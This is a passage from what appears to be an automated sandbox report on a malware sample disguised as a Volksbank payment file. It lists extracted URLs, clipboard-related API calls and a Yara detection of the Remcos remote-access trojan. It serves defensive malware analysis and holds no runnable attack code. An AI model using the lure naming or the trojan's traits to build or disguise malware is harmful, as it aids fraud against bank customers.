            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000002.3014339280.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012915497.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012866639.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013029030.000000000239C000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013164901.000000000239E000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3013126977.000000000239C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedFinishStrings.en_n0x1vWZ9nk5hsb6ZgnoOdw2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_VjBVCmhpr777yb9vmuAJ
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.sv
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b8006
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031be
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostFinish_PCore_uuJCSTysLQ9JSYLCWmrHPQ2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/Win10HostLogin_PCore_3J49gjRV3LSCVj6qj73kPQ2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_0901d04301714f
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/jsonstrings?g=EmailHrdv2&mkt=1033&hm=2
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.css?b=14512.30550
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/stat/hrd.min.js?b=14512.30550
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/federationProvider?domain=outlook.com&_=1632306668408
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=0&ver=16&build=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3004602535.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005040263.0000000002AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/idp?hm=2&emailAddress=shahak.shapira%40outlook.com&_=163230
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://outlookmobile-office365-tas.msedge.net/ab?clientId=512A4435-60B8-42A2-80D3-582B6B7FB6C0&ig=1
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2787436b358dbd81d7fd0a0cccb05788
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f068a709ecd1f0c000b440d901cea9b
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_csp?id=adbundle&qqi=CPuOuO2wkvMCFQDJuwgdDw4EyQ&gqi=
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://pki.goog/repository/0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://polyfill.io/v3/polyfill.min.js?features=2CElement.prototype.matches%2CElement.prototype.clos
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://px.ads.linkedin.com/setuid?partner=tripleliftdbredirect&tlUid=13122329571212727769&dbredirec
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://rio20prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?ea9fbfdb332f73936cf49a698ddafd8c
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s.yimg.com/lo/api/res/1.2/7zPvmktG8JzqA0vnWzpk_g--~A/Zmk9Zml0O3c9NjIyO2g9MzY4O2FwcGlkPWdlbWl
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k2.jpg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k4.jpg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://s1.adform.net/banners/scripts/rmb/Adform.DHTML.js?bv=626
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://sectigo.com/CPS0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://servedby.flashtalking.com/imp/8/106228;3700839;201;jsiframe;Adobe;1000x463DESKTOPACROBATREAD
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=4aeddfea844042999a22bdcca1fba378&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=838b780a64e64b0d92d628632c1c377c&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=bba24733ba4a487f8f8706bf3811269e&c=MSN&d=https%3A%2F%2Fwww.ms
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-ecst.licdn.com/apc/trans.gif?fa0d4adae7a556f7d0d03112de822178
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jque
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-d68e7b58/direct
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-d017f019/directi
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAKp8YX.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMqFmF.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODMk8.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODQmd.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAODept.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEFck.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOEQ0I.img?h=368&w=62
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4WR.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOF4Xx.img?h=368&w=62
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFBrV.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFC5q.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=250&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFCgW.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFE0J.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFENj.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFJFJ.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFLk7.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFWV8.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFhty.img?h=368&w=62
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFsUC.img?h=250&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFu51.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFy7B.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOFyKG.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG3Y7.img?h=250&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOG88s.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGPXq.img?h=194&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGQtJ.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGV90.img?h=194&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGapF.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGlbE.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGmTG.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOGyYN.img?h=194&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH2Ml.img?h=194&w=30
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAOH6xB.img?h=75&w=100
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB14hq0P.img?h=368&w=6
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1aXBV1.img?h=27&w=27
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&w=27
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1ftEY0.img?h=16&w=16
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1gEFcn.img?h=16&w=16
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kc8s.img?m=6&o=true
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hg4.img?h=16&w=16&m
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/_h/975a7d20/webcore/externalscripts/jquery/jquery
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/css/b5dff51-e7c3b187/kernel-9c
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static-spartan-neu-s-msn-com.akamaized.net/spartan/en-gb/_ssc/js/b5dff51-96897e59/kernel-1e4
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/11928812572019506176_2845462151855228713.jpeg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/2578937774238713912_2802581922324906360.jpeg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static.doubleclick.net/dynamic/5/283983386/6852827437855218848_345419970373613283.jpeg
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-bold.wof
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wo
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-regular.
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semibold
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-semiligh
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3012090570.0000000002B29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?3d88065febcc552cae09e5e8b74c55d5
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring-fallback.msedge.net/apc/trans.gif?7616d616e1c668bb563496121e660bee
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring-fallbacks1.msedge.net/apc/trans.gif?706bc421d298bd3a21f8d16839143f35
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring-fallbacks1.msedge.net/apc/trans.gif?98f4d87f065e77ef17a82286185ce69d
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?01af3f8dd36bcb49643452aa096ff6c0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://t-ring.msedge.net/apc/trans.gif?7de2246f1808e47769e35183d0153a7a
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/html5/ssrh.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/gadgets/in_page_full_auto_V1/Responsive_Monte_GpaSingleIfra
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/abg_lite.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/qs_click_protection.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/pagead/js/r20210916/r20110914/client/window_focus.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/simgad/14585816484902221120
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://tpc.googlesyndication.com/sodar/sodar2/224/runner.html
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?subset_id=2&fvd=n3&v=3
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?subset_id=2&fvd=n4&v=3
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://use.typekit.net/ecr2zvs.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.globalsign.com/repository/0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000001.00000002.7810435154.0000000034F10000.00000040.10000000.00040000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000004.00000002.2980976157.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/chrome/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008749648.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007602786.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3007682293.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3008046399.00000000023A9000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/pagead/drt/ui
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.google.com/recaptcha/api2/aframe
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/osd.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.googletagservices.com/activeview/js/current/rx_lidar.js?cache=r20110914
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/
            Source: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002520130.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3001766817.0000000002AC1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3002030194.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, 00000002.00000003.3005458183.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/?ocid=iehp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-8
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otBannerSdk
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/_h/9c38ab9f/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/spartan/en-gb/kernel/appcache/cache.appcache?locale=en-GB&market=GB&enableregula
            Source: bhvF4C4.tmp.2.drString found in binary or memory: https://www.msn.com/spartan/ientp?locale=en-GB&market=GB&enableregulatorypsm=0&enablecpsm=0&NTLogo=1
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0041183A OpenClipboard,GetLastError,DeleteFileW,2_2_0041183A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_0040987A
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,2_2_004098E2
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_00406DFC
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,3_2_00406E9F

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000001.00000002.7799903641.000000000416E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004180000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.7799903641.0000000004175000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe PID: 5888, type: MEMORYSTR

            System Summary

            barindex
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeProcess Stats: CPU usage > 6%
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 1_2_02D41207 Sleep,NtProtectVirtualMemory,1_2_02D41207
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,2_2_0040DD85
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_00401806 NtdllDefWindowProc_W,2_2_00401806
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 2_2_004018C0 NtdllDefWindowProc_W,2_2_004018C0
            Source: C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeCode function: 3_2_004016FD NtdllDefWindowProc_A,3_2_004016FD
